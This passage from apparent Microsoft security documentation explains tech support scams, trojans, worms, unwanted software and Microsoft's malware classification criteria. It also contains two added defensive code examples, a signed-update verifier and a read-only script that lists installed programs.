For software vendors and developers
Maintain a highly secure build and update infrastructure.
Immediately apply security patches for OS and software.
Implement mandatory integrity controls to ensure only trusted tools run.
Require multi-factor authentication for admins.
Build secure software updaters as part of the software development lifecycle.
Require SSL for update channels and implement certificate pinning.
Sign everything, including configuration files, scripts, XML files, and packages.
Check for digital signatures, and don’t let the software updater accept generic input and commands.
Develop an incident response process for supply chain attacks.
Disclose supply chain incidents and notify customers with accurate and timely information.
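The vendor guidance above ("sign everything", "check for digital signatures", "don't let the software updater accept generic input and commands") describes a verify-before-apply flow. The block below is an added example of that flow, not Microsoft's code, not any real updater, and not part of this article. To run with only the standard library it uses HMAC-SHA256 under a constructed key as a stand-in for the vendor's code-signing signature; with Authenticode or an Ed25519 key the order of checks and the rejections are the same. The manifest layout, `app.exe`, the version numbers and the `ALLOWED_OPS` vocabulary are all assumptions made for the example. Transport protection (TLS and certificate pinning, also listed above) is a separate layer not shown here.

```python
"""Verify-before-apply logic for a software updater.

Added example, not Microsoft's or any real updater's code. HMAC-SHA256
under a constructed key stands in for the vendor's code-signing
signature. Manifest layout, file names and versions are constructed.
"""
import hashlib
import hmac
import json
import re
from typing import Dict, List

SIGNING_KEY = b"constructed-demo-key-not-a-real-secret"
ALLOWED_OPS = {"replace", "delete"}  # the updater never accepts generic "run" commands


class UpdateRejected(Exception):
    """Raised with the reason an update package was refused."""


def canonical(manifest: dict) -> bytes:
    """Deterministic encoding so signer and verifier hash identical bytes."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(manifest: dict) -> str:
    """Build-infrastructure side: sign the canonical manifest."""
    return hmac.new(SIGNING_KEY, canonical(manifest), hashlib.sha256).hexdigest()


def parse_version(text: str) -> tuple:
    return tuple(int(part) for part in text.split("."))


def verify_update(manifest: dict, signature: str, files: Dict[str, bytes],
                  installed_version: str) -> List[dict]:
    """Client side: return the actions that are safe to apply, or raise."""
    # 1. Signature first: nothing in the manifest is trusted before this passes.
    if not hmac.compare_digest(sign_manifest(manifest), signature):
        raise UpdateRejected("manifest signature invalid")
    # 2. Reject rollback/replay of an older, signed-but-superseded package.
    if parse_version(manifest["version"]) <= parse_version(installed_version):
        raise UpdateRejected("downgrade or replay rejected")
    # 3. Every delivered file must be listed in the manifest and match its signed hash.
    unsigned = set(files) - set(manifest["files"])
    if unsigned:
        raise UpdateRejected(f"unsigned file(s) in package: {sorted(unsigned)}")
    for name, expected in manifest["files"].items():
        if name not in files:
            raise UpdateRejected(f"missing file {name!r}")
        actual = hashlib.sha256(files[name]).hexdigest()
        if not hmac.compare_digest(actual, expected):
            raise UpdateRejected(f"hash mismatch for {name!r}")
    # 4. Actions are a closed vocabulary over relative paths, never commands.
    for action in manifest["actions"]:
        op, path = action.get("op"), action.get("path", "")
        if op not in ALLOWED_OPS:
            raise UpdateRejected(f"unsupported action {op!r}")
        parts = re.split(r"[\\/]", path)
        if not path or ".." in parts or parts[0] == "" or ":" in path:
            raise UpdateRejected(f"bad path {path!r}")
        if op == "replace" and path not in manifest["files"]:
            raise UpdateRejected(f"replace target {path!r} not in signed file list")
    return list(manifest["actions"])


def rejection_reason(manifest, signature, files, installed_version) -> str:
    """String verdict: empty when the update is accepted."""
    try:
        verify_update(manifest, signature, files, installed_version)
        return ""
    except UpdateRejected as exc:
        return str(exc)


# Constructed sample package
NEW_BINARY = b"constructed contents of the new app.exe"
GOOD_MANIFEST = {
    "version": "1.2.3",
    "files": {"app.exe": hashlib.sha256(NEW_BINARY).hexdigest()},
    "actions": [{"op": "replace", "path": "app.exe"}],
}
GOOD_SIGNATURE = sign_manifest(GOOD_MANIFEST)

if __name__ == "__main__":
    verdict = rejection_reason(GOOD_MANIFEST, GOOD_SIGNATURE, {"app.exe": NEW_BINARY}, "1.2.2")
    print(verdict or "update accepted")
```

The order matters: the signature is checked before any field of the manifest is read, so a tampered action list or file hash is rejected as "signature invalid" rather than parsed, and a package the vendor really signed is still refused if it is older than what is installed, carries a file the manifest does not list, or asks for anything outside the fixed set of operations.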
For more general tips on protecting your systems and devices, see prevent malware infection.
Tech support scams
4/8/2019 • 2 minutes to read

Tech support scams are an industry-wide issue where scammers use scare tactics to trick users into paying for
unnecessary technical support services that supposedly fix contrived device, platform, or software problems.

How tech support scams work


Scammers may call you directly on your phone and pretend to be representatives of a software company. They
might even spoof the caller ID so that it displays a legitimate support phone number from a trusted company.
They can then ask you to install applications that give them remote access to your device. Using remote access,
these experienced scammers can misrepresent normal system output as signs of problems.
Scammers might also initiate contact by displaying fake error messages on websites you visit, displaying support
numbers and enticing you to call. They can also put your browser on full screen and display pop-up messages that
won't go away, essentially locking your browser. These fake error messages aim to trick you into calling an
indicated technical support hotline. Note that Microsoft error and warning messages never include phone
numbers.
When you engage with the scammers, they can offer fake solutions for your “problems” and ask for payment in
the form of a one-time fee or subscription to a purported support service.
For more information, view known tech support scam numbers and popular web scams.

How to protect against tech support scams


Share and implement the general tips on how to prevent malware infection.
It is also important to keep the following in mind:
Microsoft does not send unsolicited email messages or make unsolicited phone calls to request personal or
financial information, or to fix your computer.
Any communication with Microsoft has to be initiated by you.
Don’t call the number in the pop-ups. Microsoft’s error and warning messages never include a phone
number.
Download software only from official vendor websites or the Microsoft Store. Be wary of downloading
software from third-party sites, as some of them might have been modified without the author’s knowledge
to bundle support scam malware and other threats.
Use Microsoft Edge when browsing the internet. It blocks known support scam sites using Windows
Defender SmartScreen (which is also used by Internet Explorer). Furthermore, Microsoft Edge can stop
pop-up dialogue loops used by these sites.
Enable Windows Defender Antivirus in Windows 10. It detects and removes known support scam malware.

What to do if information has been given to a tech support person


Uninstall applications that scammers asked you to install. If remote access has been granted, consider resetting the
device.
Run a full scan with Windows Defender Antivirus to remove any malware. Apply all security updates as
soon as they are available.
Change passwords.
Call your credit card provider to reverse the charges, if you have already paid.
Monitor for anomalous logon activity. Use Windows Defender Firewall to block traffic to services that you
would not normally access.
Reporting tech support scams
Help Microsoft stop scammers, whether they claim to be from Microsoft or from another tech company, by
reporting tech support scams:
www.microsoft.com/reportascam
You can also report any unsafe website that you suspect is a phishing website or contains malicious content
directly to Microsoft by filling out a Report an unsafe site form or using built in web browser functionality.
Trojans
4/8/2019 • 2 minutes to read

Trojans are a common type of malware which, unlike viruses, can’t spread on their own. This means they either
have to be downloaded manually or another malware needs to download and install them.
Trojans often use the same file names as real and legitimate apps. It is easy to accidentally download a trojan
thinking that it is a legitimate app.

How trojans work


Trojans can come in many different varieties, but generally they do the following:
Download and install other malware, such as viruses or worms.
Use the infected device for click fraud.
Record keystrokes and websites visited.
Send information about the infected device to a malicious hacker including passwords, login details for
websites, and browsing history.
Give a malicious hacker control over the infected device.

How to protect against trojans


Use the following free Microsoft software to detect and remove trojans:
Windows Defender Antivirus for Windows 10 and Windows 8.1, or Microsoft Security Essentials for
previous versions of Windows.
Microsoft Safety Scanner
For more general tips, see prevent malware infection.
Unwanted software
4/8/2019 • 2 minutes to read

Unwanted software consists of programs that alter the Windows experience without your consent or control. This can take
the form of modified browsing experience, lack of control over downloads and installation, misleading messages,
or unauthorized changes to Windows settings.

How unwanted software works


Unwanted software can be introduced when a user searches for and downloads applications from the internet.
Some applications are software bundlers, which means that they are packed with other applications. As a result,
other programs can be inadvertently installed when the original application is downloaded.
Here are some indications of unwanted software:
There are programs that you did not install and that may be difficult to uninstall
Browser features or settings have changed, and you can’t view or modify them
There are excessive messages about your device's health or about files and programs
There are ads that cannot be easily closed
Some indicators are harder to recognize because they are less disruptive, but are still unwanted. For example,
unwanted software can modify web pages to display specific ads, monitor browsing activities, or remove control of
the browser.
Microsoft uses extensive evaluation criteria to identify unwanted software.

How to protect against unwanted software


To prevent unwanted software infection, download software only from official websites, or from the Microsoft
Store. Be wary of downloading software from third-party sites.
Use Microsoft Edge when browsing the internet. Microsoft Edge includes additional protections that effectively
block browser modifiers that can change your browser settings. Microsoft Edge also blocks known websites
hosting unwanted software using SmartScreen (also used by Internet Explorer).
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
For more general tips, see prevent malware infection.
What should I do if my device is infected?
If you suspect that you have unwanted software, you can submit files for analysis.
Some unwanted software adds uninstallation entries, which means that you can remove them using Settings.
1. Select the Start button
2. Go to Settings > Apps > Apps & features.
3. Select the app you want to uninstall, then click Uninstall.
If you only recently noticed symptoms of unwanted software infection, consider sorting the apps by install date,
and then uninstall the most recent apps that you did not install.
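The advice above relies on the uninstall entries that well-behaved installers register. As an added example (not part of the original page), this PowerShell script reads those same Add/Remove Programs registry keys, lists programs newest first, and flags entries that have no uninstall command or that hide themselves from Apps & features; it only reads the registry and removes nothing. Function and variable names are the example's own.

```powershell
# Added example, not from the original page. Lists programs registered under the
# standard Add/Remove Programs registry locations (the entries Settings > Apps &
# features shows), newest first, so software you did not install stands out.
# Read-only: nothing is uninstalled. Function and variable names are the example's own.

$uninstallKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*'
)

function Get-RecentlyInstalledSoftware {
    param(
        # Show entries installed within this many days. Entries with no recorded
        # install date are kept, because a missing date is itself worth a look.
        [int]$Days = 30
    )

    $cutoff = (Get-Date).AddDays(-$Days)

    Get-ItemProperty -Path $uninstallKeys -ErrorAction SilentlyContinue |
        Where-Object { $_.DisplayName } |
        ForEach-Object {
            # InstallDate, when the installer recorded it, is a yyyyMMdd string.
            $installed = $null
            if ($_.InstallDate -match '^\d{8}$') {
                try {
                    $installed = [datetime]::ParseExact($_.InstallDate, 'yyyyMMdd',
                        [Globalization.CultureInfo]::InvariantCulture)
                } catch { $installed = $null }
            }

            [pscustomobject]@{
                Name            = $_.DisplayName
                Publisher       = $_.Publisher
                Installed       = $installed
                # No UninstallString: Apps & features has no standard way to remove it.
                HasUninstaller  = [bool]$_.UninstallString
                # SystemComponent = 1 hides the entry from Apps & features altogether.
                HiddenFromApps  = ($_.SystemComponent -eq 1)
                Hive            = $_.PSDrive.Name
                UninstallString = $_.UninstallString
            }
        } |
        Where-Object { ($null -eq $_.Installed) -or ($_.Installed -ge $cutoff) } |
        Sort-Object -Property Installed -Descending
}

Get-RecentlyInstalledSoftware -Days 30 |
    Format-Table Name, Publisher, Installed, HasUninstaller, HiddenFromApps, Hive -AutoSize
```

Entries that appeared recently, carry an unfamiliar publisher, lack an uninstaller, or are hidden from Apps & features are the ones to review before removing them through Settings.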
You may also need to remove browser add-ons in your browsers, such as Internet Explorer, Firefox, or Chrome.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
Worms
4/8/2019 • 2 minutes to read

A worm is a type of malware that can copy itself and often spreads through a network by exploiting security
vulnerabilities. It can spread through email attachments, text messages, file-sharing programs, social networking
sites, network shares, removable drives, and software vulnerabilities.

How worms work


Worms represent a large category of malware. Different worms use different methods to infect devices.
Depending on the variant, they can steal sensitive information, change security settings, send information to
malicious hackers, stop users from accessing files, and other malicious activities.
Jenxcus (also known as Dunihi), Gamarue (also known as Androm), and Bondat have consistently remained at the
top of the list of malware that infect users running Microsoft security software. Although these worms share some
commonalities, it is interesting to note that they also have distinct characteristics.
Jenxcus can not only infect removable drives but can also act as a backdoor that connects back to its
server. This threat typically gets onto a device through a drive-by download attack, meaning it's installed
when users simply visit a compromised web page.
Gamarue typically arrives through spam campaigns, exploits, downloaders, social networking sites, and
removable drives. When Gamarue infects a device, it becomes a distribution channel for other malware.
We’ve seen it distribute other malware such as infostealers, spammers, clickers, downloaders, and rogues.
Bondat typically arrives through fictitious Nullsoft Scriptable Install System (NSIS), Java installers, and
removable drives. When Bondat infects a system, it gathers information about the machine such as device
name, Globally Unique Identifier (GUID), and OS build. It then sends that information to a remote server.
Both Bondat and Gamarue have clever ways of obscuring themselves to evade detection. By hiding what they are
doing, they try to avoid detection by security software.
WannaCrypt also deserves a mention here. Unlike older worms that often spread just because they could,
modern worms often spread to drop a payload (e.g. ransomware).
This image shows how a worm can quickly spread through a shared USB drive.
Figure: worm spreading from a shared USB drive
How to protect against worms
Enable Windows Defender AV in Windows 10. It provides real-time protection against threats and detects and
removes known unwanted software.
Download Microsoft Security Essentials for real-time protection in Windows 7 or Windows Vista.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
For more general tips, see prevent malware infection.
How Microsoft identifies malware and potentially unwanted applications
4/8/2019 • 7 minutes to read

Microsoft aims to provide customers with the most delightful and productive Windows experience possible. To
help achieve that, we try our best to ensure our customers are safe and in control of their devices.
Microsoft gives you the information and tools you need when downloading, installing, and running software, as
well as tools that protect you when we know that something unsafe is happening. Microsoft does this by
identifying and analyzing software and online content against criteria described in this article.
You can participate in this process by submitting software for analysis. Our analysts and intelligent systems can
then help identify undesirable software and ensure they are covered by our security solutions.
Because new forms of malware and potentially unwanted applications are being developed and distributed rapidly,
Microsoft reserves the right to adjust, expand, and update these criteria without prior notice or announcements.

Malware
Malware is the overarching name for applications and other code, i.e. software, that Microsoft classifies more
granularly as malicious software or unwanted software.
Malicious software
Malicious software is an application or code that compromises user security. Malicious software might steal your
personal information, lock your PC until you pay a ransom, use your PC to send spam, or download other
malicious software. In general, malicious software tricks, cheats, or defrauds users, places users in vulnerable
states, or performs other malicious activities.
Microsoft classifies most malicious software into one of the following categories:
Backdoor: A type of malware that gives malicious hackers remote access to and control of your PC.
Downloader: A type of malware that downloads other malware onto your PC. It needs to connect to the
internet to download files.
Dropper: A type of malware that installs other malware files onto your PC. Unlike a downloader, a dropper
doesn’t need to connect to the internet to drop malicious files. The dropped files are typically embedded in
the dropper itself.
Exploit: A piece of code that uses software vulnerabilities to gain access to your PC and perform other
tasks, such as installing malware. See more information about exploits.
Hacktool: A type of tool that can be used to gain unauthorized access to your PC.
Macro virus: A type of malware that spreads through infected documents, such as Microsoft Word or Excel
documents. The virus is run when you open an infected document.
Obfuscator: A type of malware that hides its code and purpose, making it more difficult for security
software to detect or remove.
Password stealer: A type of malware that gathers your personal information, such as user names and
passwords. It often works along with a keylogger, which collects and sends information about the keys you
press and websites you visit.
Ransomware: A type of malware that encrypts your files or makes other modifications that can prevent
you from using your PC. It then displays a ransom note stating you must pay money, complete surveys, or
perform other actions before you can use your PC again. See more information about ransomware.
Rogue security software: Malware that pretends to be security software but doesn't provide any
protection. This type of malware usually displays alerts about nonexistent threats on your PC. It also tries to
convince you to pay for its services.
Trojan: A type of malware that attempts to appear harmless. Unlike a virus or a worm, a trojan doesn't
spread by itself. Instead it tries to look legitimate, tricking users into downloading and installing it. Once
installed, trojans perform a variety of malicious activities, such as stealing personal information,
downloading other malware, or giving attackers access to your PC.
Trojan clicker: A type of trojan that automatically clicks buttons or similar controls on websites or
applications. Attackers can use this trojan to click on online advertisements. These clicks can skew online
polls or other tracking systems and can even install applications on your PC.
Worm: A type of malware that spreads to other PCs. Worms can spread through email, instant messaging,
file sharing platforms, social networks, network shares, and removable drives. Sophisticated worms take
advantage of software vulnerabilities to propagate.
Unwanted software
Microsoft believes that you should have control over your Windows experience. Software running on Windows
should keep you in control of your PC through informed choices and accessible controls. Microsoft identifies
software behaviors that ensure you stay in control. We classify software that does not fully demonstrate these
behaviors as "unwanted software".
Lack of choice
You must be notified about what is happening on your PC, including what software does and whether it is active.
Software that exhibits lack of choice might:
Fail to provide prominent notice about the behavior of the software and its purpose and intent.
Fail to clearly indicate when the software is active and might also attempt to hide or disguise its presence.
Install, reinstall, or remove software without your permission, interaction, or consent.
Install other software without a clear indication of its relationship to the primary software.
Circumvent user consent dialogs from the browser or operating system.
Falsely claim to be software from Microsoft.
Software must not mislead or coerce you into making decisions about your PC. This is considered behavior that
limits your choices. In addition to the previous list, software that exhibits lack of choice might:
Display exaggerated claims about your PC’s health.
Make misleading or inaccurate claims about files, registry entries, or other items on your PC.
Display claims in an alarming manner about your PC's health and require payment or certain actions in
exchange for fixing the purported issues.
Software that stores or transmits your activities or data must:
Give you notice and get consent to do so. Software should not include an option that configures it to hide
activities associated with storing or transmitting your data.
Lack of control
You must be able to control software on your computer. You must be able to start, stop, or otherwise revoke
authorization to software.
Software that exhibits lack of control might:
Prevent or limit you from viewing or modifying browser features or settings.
Open browser windows without authorization.
Redirect web traffic without giving notice and getting consent.
Modify or manipulate webpage content without your consent.
Software that changes your browsing experience must only use the browser's supported extensibility model for
installation, execution, disabling, or removal. Browsers that do not provide supported extensibility models will be
considered non-extensible and should not be modified.
Installation and removal
You must be able to start, stop, or otherwise revoke authorization given to software. Software should obtain your
consent before installing, and it must provide a clear and straightforward way for you to install, uninstall, or
disable it.
Software that delivers poor installation experience might bundle or download other "unwanted software" as
classified by Microsoft.
Software that delivers poor removal experience might:
Present confusing or misleading prompts or pop-ups while being uninstalled.
Fail to use standard install/uninstall features, such as Add/Remove Programs.
Advertising and advertisements
Software that promotes a product or service outside of the software itself can interfere with your computing
experience. You should have clear choice and control when installing software that presents advertisements.
The advertisements that are presented by software must:
Include an obvious way for users to close the advertisement. The act of closing the advertisement must not
open another advertisement.
Include the name of the software that presented the advertisement.
The software that presents these advertisements must:
Provide a standard uninstall method for the software using the same name as shown in the advertisement it
presents.
Advertisements shown to you must:
Be distinguishable from website content.
Not mislead, deceive, or confuse.
Not contain malicious code.
Not invoke a file download.
Consumer opinion
Microsoft maintains a worldwide network of analysts and intelligence systems where you can submit software for
analysis. Your participation helps us identify new malware quickly. After analysis, Microsoft creates Security
intelligence for software that meets the described criteria. This Security intelligence identifies the software as
malware and is available to all users through Windows Defender Antivirus and other Microsoft antimalware
solutions.
Potentially unwanted application (PUA)
Our PUA protection aims to safeguard user productivity and ensure enjoyable Windows experiences. This optional
protection, available to enterprises, helps deliver more productive, performant, and delightful Windows
experiences.
PUAs are not considered malware.
Microsoft uses specific categories and the category definitions to classify software as a PUA.
Advertising software: Software that displays advertisements or promotions, or prompts the user to
complete surveys for other products or services in software other than itself. This includes software that
inserts advertisements to webpages.
Torrent software: Software that is used to create or download torrents or other files specifically used with
peer-to-peer file-sharing technologies.
Cryptomining software: Software that uses your computer resources to mine cryptocurrencies.
Bundling software: Software that offers to install other software that is not digitally signed by the same
entity. Also, software that offers to install other software that qualifies as PUA based on the criteria outlined in
this document.
Marketing software: Software that monitors and transmits the activities of the user to applications or
services other than itself for marketing research.
Evasion software: Software that actively tries to evade detection by security products, including software
that behaves differently in the presence of security products.
Poor industry reputation: Software that trusted security providers detect with their security products. The
security industry is dedicated to protecting customers and improving their experiences. Microsoft and other
organizations in the security industry continuously exchange knowledge about files we have analyzed to
provide users with the best possible protection.
Submit files for analysis
4/8/2019 • 3 minutes to read

If you have a file that you suspect might be malware or is being incorrectly detected, you can submit it to us for
analysis. This page has answers to some common questions about submitting a file for analysis.

How do I send a malware file to Microsoft?


You can send us files that you think might be malware or files that have been incorrectly detected through the
sample submission portal.
We receive a large number of samples from many sources. Our analysis is prioritized by the number of file
detections and the type of submission. You can help us complete a quick analysis by providing detailed information
about the product you were using and what you were doing when you found the file.
If you sign in before you submit a sample, you will be able to track your submissions.

Can I send a sample by email?


No, we only accept submissions through our sample submission portal.

Can I submit a sample without signing in?


Yes, you may submit a file as an anonymous home customer. You will get a link to a webpage where you can view
the status of the submission.
If you're an enterprise customer, you need to sign in so that we can prioritize your submission appropriately. If you
are currently experiencing a virus outbreak or security-related incident, you should contact your designated
Microsoft support professional or go to Microsoft Support for immediate assistance.

What is the Software Assurance ID (SAID)?


The Software Assurance ID (SAID) is for enterprise customers to track support entitlements. The submission
portal accepts and retains SAID information and allows customers with valid SAIDs to make higher priority
submissions.
How do I dispute the detection of my program?
Submit the file in question as a software developer. Wait until your submission has a final determination.
If you’re not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.

How do I track or view past sample submissions?


You can track your submissions through the submission history page. Your submission will only appear on this
page if you were signed in when you submitted it.
If you’re not signed in when you submit a sample, you will be redirected to a tracking page. Bookmark this page if
you want to come back and check on the status of your submission.
What does the submission status mean?
Each submission is shown to be in one of the following status types:
Submitted—the file has been received
In progress—an analyst has started checking the file
Closed—a final determination has been given by an analyst
If you are signed in, you can see the status of any files you submit to us on the submission history page.

How does Microsoft prioritize submissions?


Processing submissions takes dedicated analyst resources. Because we regularly receive a large number of
submissions, we handle them in priority order. The following factors affect how we prioritize submissions:
Prevalent files with the potential to impact large numbers of computers are prioritized.
Authenticated customers, especially enterprise customers with valid Software Assurance IDs (SAIDs), are
given priority.
Submissions flagged as high priority by SAID holders are given immediate attention.
Your submission is immediately scanned by our systems to give you the latest determination even before an
analyst starts handling your case. Note that the same file may have already been processed by an analyst. To check
for updates to the determination, select rescan on the submission details page.
Microsoft Safety Scanner
5/14/2019 • 2 minutes to read

Microsoft Safety Scanner is a scan tool designed to find and remove malware from Windows computers. Simply
download it and run a scan to find malware and try to reverse changes made by identified threats.
Download Microsoft Safety Scanner (32-bit)
Download Microsoft Safety Scanner (64-bit)

NOTE: The security intelligence update version of the Microsoft Safety Scanner matches the version described
in this web page.

Safety Scanner only scans when manually triggered and is available for use 10 days after being downloaded. We
recommend that you always download the latest version of this tool before each scan.

NOTE: This tool does not replace your antimalware product. For real-time protection with automatic updates,
use Windows Defender Antivirus on Windows 10 and Windows 8 or Microsoft Security Essentials on
Windows 7. These antimalware products also provide powerful malware removal capabilities. If you are
having difficulties removing malware with these products, you can refer to our help on removing difficult
threats.
NOTE: Safety Scanner is a portable executable and does not appear in the Windows Start menu or as an icon
on the desktop. Note where you saved this download.

System requirements
Safety Scanner helps remove malicious software from computers running Windows 10, Windows 10 Tech
Preview, Windows 8.1, Windows 8, Windows 7, Windows Server 2016, Windows Server Tech Preview, Windows
Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, or Windows Server 2008. Please refer to the
Microsoft Lifecycle Policy.

How to run a scan


1. Download this tool and open it.
2. Select the type of scan you want to run and start the scan.
3. Review the scan results displayed on screen. For detailed detection results, view the log at
%SYSTEMROOT%\debug\msert.log.
To remove this tool, delete the executable file (msert.exe by default).
For more information about the Safety Scanner, see the support article on how to troubleshoot problems using
Safety Scanner.

Related resources
Troubleshooting Safety Scanner
Windows Defender Antivirus
Microsoft Security Essentials
Removing difficult threats
Submit file for malware analysis
Microsoft antimalware and threat protection solutions
Top scoring in industry tests
4/8/2019 • 5 minutes to read

Windows Defender Advanced Threat Protection (Windows Defender ATP) technologies consistently achieve high
scores in independent tests, demonstrating the strength of their enterprise threat protection capabilities. Microsoft
aims to be transparent about these test scores. This page summarizes the results and provides analysis.

Endpoint detection & response


Windows Defender ATP endpoint detection and response capabilities provide advanced attack detections that are
near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a
breach, and take response actions to remediate threats.
MITRE: Industry-leading optics and detection capabilities
MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also
known as Boron or UPS). To isolate detection capabilities, all protection and prevention features were turned off.
Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK
framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics.
ATT&CK-based evaluation: Leading optics and detection capabilities | Analysis
Windows Defender ATP delivered comprehensive coverage of attacker techniques across the entire attack
chain. Highlights included the breadth of telemetry, the strength of threat intelligence, and the advanced,
automatic detection through machine learning, heuristics, and behavior monitoring.

Next generation protection


Windows Defender Antivirus consistently performs highly in independent tests, displaying how it is a top choice in
the antivirus market. Note that these tests only provide results for antivirus and do not test for additional security
protections.
Windows Defender Antivirus is part of the next generation Windows Defender ATP security stack, which addresses
the latest and most sophisticated threats today. In some cases, customers might not even know they were protected
because a cyberattack is stopped milliseconds after a campaign starts. That's because Windows Defender Antivirus
detects and stops malware at first sight by using machine learning, artificial intelligence, behavioral analysis, and
other advanced technologies.
AV-TEST: Protection score of 6.0/6.0 in the latest test
The AV-TEST Product Review and Certification Report tests on three categories: protection, performance, and
usability. The scores listed below are for the Protection category, which has two scores: Real-World Testing and the
AV-TEST reference set (known as "Prevalent Malware").
January - February 2019 AV-TEST Business User test: Protection score 6.0/6.0 Latest
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 19,956 malware samples
used. This is the fifth consecutive cycle that Windows Defender Antivirus achieved a perfect score.
November - December 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 19,956
malware samples.
September - October 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, protecting against 21,566 of
21,568 tested malware samples.
July - August 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 20,022
malware samples.
May - June 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 5,790
malware samples.
March - April 2018 AV-TEST Business User test: Protection score 5.5/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680
malware samples (0.035% miss rate).
January - February 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 5,105 malware samples
tested.

AV-Comparatives: Protection rating of 99.6% in the latest test

AV-Comparatives is an independent organization offering systematic testing for security software such as
PC/Mac-based antivirus products and mobile security solutions.
Real-World Protection Test Enterprise August - November 2018: Protection Rate 99.6% Latest
This test, as defined by AV-Comparatives, attempts to assess the effectiveness of each security program to
protect a computer against active malware threats while online. The test set contained 1207 test cases (such
as malicious URLs).
Malware Protection Test Enterprise August 2018: Protection Rate 99.9%
This test, as defined by AV-Comparatives, attempts to assess a security program’s ability to protect a
system against infection by malicious files before, during or after execution. The results are based on testing
against 1,556 malware samples.
Real-World Protection Test Enterprise March - June 2018: Protection Rate 98.7%
The test set contained 1,163 test cases (such as malicious URLs).
Malware Protection Test Enterprise March 2018: Protection Rate 99.9%
For this test, 1,470 recent malware samples were used.
Historical AV-Comparatives Microsoft tests
SE Labs: Total accuracy rating of AAA in the latest test
SE Labs tests a range of solutions used by products and services to detect and/or protect against attacks, including
endpoint software, network appliances, and cloud services.
Enterprise Endpoint Protection October - December 2018: AAA award
Microsoft's next-gen protection was named as one of the leading products, stopping all of the public and
targeted attacks.
Enterprise Endpoint Protection July - September 2018: AAA award
Microsoft's next-gen protection was named as one of the most effective products, stopping all public and
targeted attacks. It showcased its ability to block malicious URLs, deal with exploits, and classify legitimate
apps and websites correctly.
Enterprise Endpoint Protection April - June 2018: AAA award
Microsoft's next-gen protection was named as one of the most effective products, stopping all targeted
attacks and the vast majority of public threats.

To what extent are tests representative of protection in the real world?


It is important to remember that Microsoft sees a wider and broader set of threats beyond what’s tested in the
evaluations highlighted above. For example, in an average month, we identify over 100 million new threats. Even if
an independent tester can acquire and test 1% of those threats, that is a million tests across 20 or 30 products. In
other words, the vastness of the malware landscape makes it extremely difficult to evaluate the quality of protection
against real world threats.
The capabilities within Windows Defender ATP provide additional layers of protection that are not factored into
industry tests, and address some of the latest and most sophisticated threats. Isolating AV from the rest of
Windows Defender ATP creates a partial picture of how our security stack operates in the real world. For example,
attack surface reduction and endpoint detection & response capabilities can help prevent malware from getting
onto devices in the first place. We have proven that Windows Defender ATP components catch samples that
Windows Defender Antivirus missed in these industry tests, which is more representative of how effectively our
security suite protects customers in the real world.
Using independent tests, customers can view one aspect of their security suite but can't assess the complete
protection of all the security features. Microsoft is highly engaged in working with several independent testers to
evolve security testing to focus on the end-to-end security stack. In the meantime, customers can evaluate
Windows Defender Advanced Threat Protection in their own networks by signing up for a 90-day trial of Windows
Defender ATP, or enabling Preview features on existing tenants.
Industry collaboration programs
4/5/2019 • 2 minutes to read

Microsoft has several industry-wide collaboration programs with different objectives and requirements. Enrolling
in the right program can help you protect your customers, gain more insight into the current threat landscape, or
assist in disrupting the malware ecosystem.

Virus Information Alliance (VIA)


The VIA program gives members access to information that will help improve protection for Microsoft customers.
Malware telemetry and samples can be provided to security teams to help identify gaps in their protection,
prioritize new threat coverage, or better respond to threats.
You must be a member of VIA if you want to apply for membership to the other programs.
Go to the VIA program page for more information.

Microsoft Virus Initiative (MVI)


MVI is open to organizations who build and own a Real Time Protection (RTP) antimalware product of their own
design, or one developed using a third-party antivirus SDK.
Members get access to Microsoft client APIs for the Windows Defender Security Center, IOAV, AMSI, and Cloud
Files, along with health data and other telemetry to help their customers stay protected. Antimalware products are
submitted to Microsoft for performance testing on a regular basis.
Go to the MVI program page for more information.

Coordinated Malware Eradication (CME)


CME is open to organizations who are involved in cybersecurity and antimalware or interested in fighting
cybercrime.
The program aims to bring organizations in cybersecurity and other industries together to pool tools, information
and actions to drive coordinated campaigns against malware. The ultimate goal is to create efficient and long-
lasting results for better protection of our collective communities, customers, and businesses.
Go to the CME program page for more information.
Virus Information Alliance
4/8/2019 • 2 minutes to read

The Virus Information Alliance (VIA) is a public antimalware collaboration program for security software
providers, security service providers, antimalware testing organizations, and other organizations involved in
fighting cybercrime.
Members of the VIA program collaborate by exchanging technical information on malicious software with
Microsoft, with the goal of improving protection for Microsoft customers.

Better protection for customers against malware


The VIA program gives members access to information that will help improve protection for Microsoft customers.
For example, the program provides malware telemetry and samples to security product teams to identify gaps in
their protection and prioritize new threat coverage.
Malware prevalence data is provided to antimalware testers to assist them in selecting sample sets and setting
scoring criteria that represent the real-world threat landscape. Service organizations, such as a CERT, can leverage
